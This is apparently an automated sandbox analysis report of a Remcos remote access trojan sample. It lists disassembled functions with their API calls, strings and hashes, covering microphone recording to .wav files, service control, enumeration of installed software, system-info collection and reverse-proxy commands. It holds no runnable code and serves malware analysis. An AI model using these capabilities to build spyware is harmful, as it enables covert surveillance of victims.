                              • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                              • Opcode Fuzzy Hash: 49a4e998ced2e249282c630ffc9b744f5a4c3aafdaefe9346f23a023119a2075
                              • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                              Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • SetEvent.KERNEL32(?,?), ref: 00404E71
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                              • TranslateMessage.USER32(?), ref: 00404F30
                              • DispatchMessageA.USER32(?), ref: 00404F3B
                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                              • String ID: CloseChat$DisplayMessage$GetMessage
                              • API String ID: 2956720200-749203953
                              • Opcode ID: 9e828d8d79306d3ca16dab3380ce8c6928072e32339e335044387e38b1293e95
                              • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                              • Opcode Fuzzy Hash: 9e828d8d79306d3ca16dab3380ce8c6928072e32339e335044387e38b1293e95
                              • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                              Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                              Download Yara Rule
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ControlManager
                              • String ID:
                              • API String ID: 221034970-0
                              • Opcode ID: 908c53c8f7a59e1588471b411fc3b23151cbb11a3faa38c431a8a4d25f5a2ed3
                              • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                              • Opcode Fuzzy Hash: 908c53c8f7a59e1588471b411fc3b23151cbb11a3faa38c431a8a4d25f5a2ed3
                              • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                              Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 00446DDF
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              • _free.LIBCMT ref: 00446DEB
                              • _free.LIBCMT ref: 00446DF6
                              • _free.LIBCMT ref: 00446E01
                              • _free.LIBCMT ref: 00446E0C
                              • _free.LIBCMT ref: 00446E17
                              • _free.LIBCMT ref: 00446E22
                              • _free.LIBCMT ref: 00446E2D
                              • _free.LIBCMT ref: 00446E38
                              • _free.LIBCMT ref: 00446E46
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                              • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                              • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                              • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                              Function 0041B824 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                              • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                              Strings
                              • DisplayName, xrefs: 0041B8D1
                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041B83C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEnumOpen
                              • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                              • API String ID: 1332880857-3614651759
                              • Opcode ID: 7508191cb52aa9fc353c449c1f5afcd7963d8d9ef058f972d88bedc8c1be360d
                              • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                              • Opcode Fuzzy Hash: 7508191cb52aa9fc353c449c1f5afcd7963d8d9ef058f972d88bedc8c1be360d
                              • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                              Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Eventinet_ntoa
                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                              • API String ID: 3578746661-4192532303
                              • Opcode ID: 0d3f72b4862548af90ea2b902a190bfca7b75d93e0c06f9e40b9838ab347fbb0
                              • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                              • Opcode Fuzzy Hash: 0d3f72b4862548af90ea2b902a190bfca7b75d93e0c06f9e40b9838ab347fbb0
                              • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                              Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                              Download Yara Rule
                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                              • Sleep.KERNEL32(00000064), ref: 00416688
                              • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CreateDeleteExecuteShellSleep
                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                              • API String ID: 1462127192-2001430897
                              • Opcode ID: d375238ffbdedef1dde6657c06b39fad1c3bbdc79052b82f4ca783474d06c829
                              • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                              • Opcode Fuzzy Hash: d375238ffbdedef1dde6657c06b39fad1c3bbdc79052b82f4ca783474d06c829
                              • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                              Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • _strftime.LIBCMT ref: 00401AD3
                                • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                              • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                              • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                              • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                              • API String ID: 3809562944-3643129801
                              • Opcode ID: 89ccb3b3af48ec40c189566ce4319a944db1d9faa1adeed037c9ba1adf873a40
                              • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                              • Opcode Fuzzy Hash: 89ccb3b3af48ec40c189566ce4319a944db1d9faa1adeed037c9ba1adf873a40
                              • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                              Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                              Download Yara Rule
                              APIs
                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                              • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                              • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                              • waveInStart.WINMM ref: 00401A81
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                              • String ID: XCG$`=G$x=G
                              • API String ID: 1356121797-903574159
                              • Opcode ID: df66b5dce40286873da021395106849cc9c08a1aee5ad096444ea0181d895aab
                              • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                              • Opcode Fuzzy Hash: df66b5dce40286873da021395106849cc9c08a1aee5ad096444ea0181d895aab
                              • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                              Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                              • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                              • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                              • TranslateMessage.USER32(?), ref: 0041C9FB
                              • DispatchMessageA.USER32(?), ref: 0041CA05
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                              • String ID: Remcos
                              • API String ID: 1970332568-165870891
                              • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                              • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                              • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                              • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                              Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                              • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                              • Opcode Fuzzy Hash: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                              • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                              Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                              Download Yara Rule
                              APIs
                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                              • __alloca_probe_16.LIBCMT ref: 00452C91
                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                              • __alloca_probe_16.LIBCMT ref: 00452D3B
                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                              • __freea.LIBCMT ref: 00452DAA
                              • __freea.LIBCMT ref: 00452DB6
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                              • String ID:
                              • API String ID: 201697637-0
                              • Opcode ID: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                              • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                              • Opcode Fuzzy Hash: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                              • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                              Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                              • _memcmp.LIBVCRUNTIME ref: 004446A3
                              • _free.LIBCMT ref: 00444714
                              • _free.LIBCMT ref: 0044472D
                              • _free.LIBCMT ref: 0044475F
                              • _free.LIBCMT ref: 00444768
                              • _free.LIBCMT ref: 00444774
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorLast$_abort_memcmp
                              • String ID: C
                              • API String ID: 1679612858-1037565863
                              • Opcode ID: acf25849c73b51f2f110b66ae3427c3368cce3f94afac0067903556d8f1eaec6
                              • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                              • Opcode Fuzzy Hash: acf25849c73b51f2f110b66ae3427c3368cce3f94afac0067903556d8f1eaec6
                              • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                              Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: tcp$udp
                              • API String ID: 0-3725065008
                              • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                              • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                              • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                              • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                              Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                              Download Yara Rule
                              APIs
                              • ExitThread.KERNEL32 ref: 004017F4
                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                              • __Init_thread_footer.LIBCMT ref: 004017BC
                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                              • String ID: Ho]$p[G$>G$>G
                              • API String ID: 1596592924-3585548411
                              • Opcode ID: a14ce8dca8c50f9d7d6b9dcd202626e44b251b874e1b71026016f31bc5760569
